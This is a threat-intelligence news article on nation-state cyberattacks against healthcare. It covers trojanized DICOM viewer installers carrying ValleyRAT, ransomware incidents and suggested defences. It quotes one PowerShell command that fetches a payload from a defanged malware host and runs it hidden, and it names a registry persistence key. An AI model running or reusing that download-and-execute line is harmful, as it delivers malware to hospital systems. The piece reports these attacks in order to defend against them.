The healthcare sector faces an unprecedented surge in cyberattacks from nation-state actors seeking to disrupt critical IT infrastructure and operational technology (OT) systems.
Since early 2024, advanced persistent threat (APT) groups linked to Iran, North Korea, and China have exploited vulnerabilities in healthcare networks to deploy destructive malware, ransomware, and backdoors.
These attacks aim to sabotage patient care systems, including diagnostic tools, laboratory automation, and life-support devices, while exfiltrating sensitive biomedical research data.
.png
)
A May 2025 advisory by ICS-CERT warned of memory corruption flaws in Pixmeo OsiriX MD (CVE-2025-XXXXX), which could allow attackers to crash systems or steal credentials.
Silobreaker analysts recently identified a spike in malware campaigns exploiting Digital Imaging and Communications in Medicine (DICOM) protocols, widely used for medical imaging.
In one campaign, attackers distributed trojanized DICOM viewer software-including spoofed Philips and Siemens applications-to deploy backdoors like ValleyRAT and Floxif.
These tools enable remote access to networked MRI/CT scanners and patient databases. Researchers noted that the malware’s command-and-control (C2) infrastructure overlaps with known Chinese APT clusters, including Silver Fox and Panda Burning Incense.
The financial and human costs are staggering. The 2024 ALPHV ransomware attack on Change Healthcare disrupted 100+ critical applications, delaying prescriptions for 190 million patients.
Similarly, the Qilin ransomware group’s breach of Synnovis forced London hospitals to cancel thousands of surgeries.
Threat actors increasingly pivot from IT to OT systems, exploiting legacy medical devices with hardcoded passwords or unpatched libraries.
Exploiting DICOM Protocols: A Gateway to Medical Device Tampering
A February 2025 Forescout report revealed 29 malicious DICOM viewer samples designed to deploy ValleyRAT.
Attackers used filenames like Philips_DICOM_Viewer_Installer.exe to trick healthcare staff into executing PowerShell scripts that fetch payloads:-
powershell Invoke-WebRequest -Uri "hxxps://malware[.]xyz/philips_update" -OutFile "$env:TEMP\~tmp.exe"; Start-Process "$env:TEMP\~tmp.exe" -WindowStyle Hidden
Once installed, ValleyRAT establishes persistence via registry keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) and communicates with C2 servers using AES-encrypted HTTP requests.
Silobreaker’s analysis of network traffic showed beaconing intervals of 300 seconds, mimicking legitimate DICOM data transfers to evade detection.
The malware also abuses DICOM’s image-sharing protocol to alter diagnostic results. For example, researchers demonstrated how attackers could inject fake tumors into CT scans by manipulating pixel data in DICOM files.
While such attacks remain rare, exposed DICOM servers-over 3,000 of which are publicly accessible-provide low-hanging fruit for APTs.
Healthcare institutions are advised to segment IT/OT networks, enforce multi-factor authentication for DICOM systems, and monitor for anomalous PowerShell activity.
Silobreaker’s threat intelligence platform highlights ongoing campaigns exploiting CVE-2023-34362 (MOVEit) and Citrix vulnerabilities, underscoring the need for proactive patch management.
As nation-state actors refine their tactics, integrating threat intelligence into incident response plans becomes a lifeline for patient safety.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers
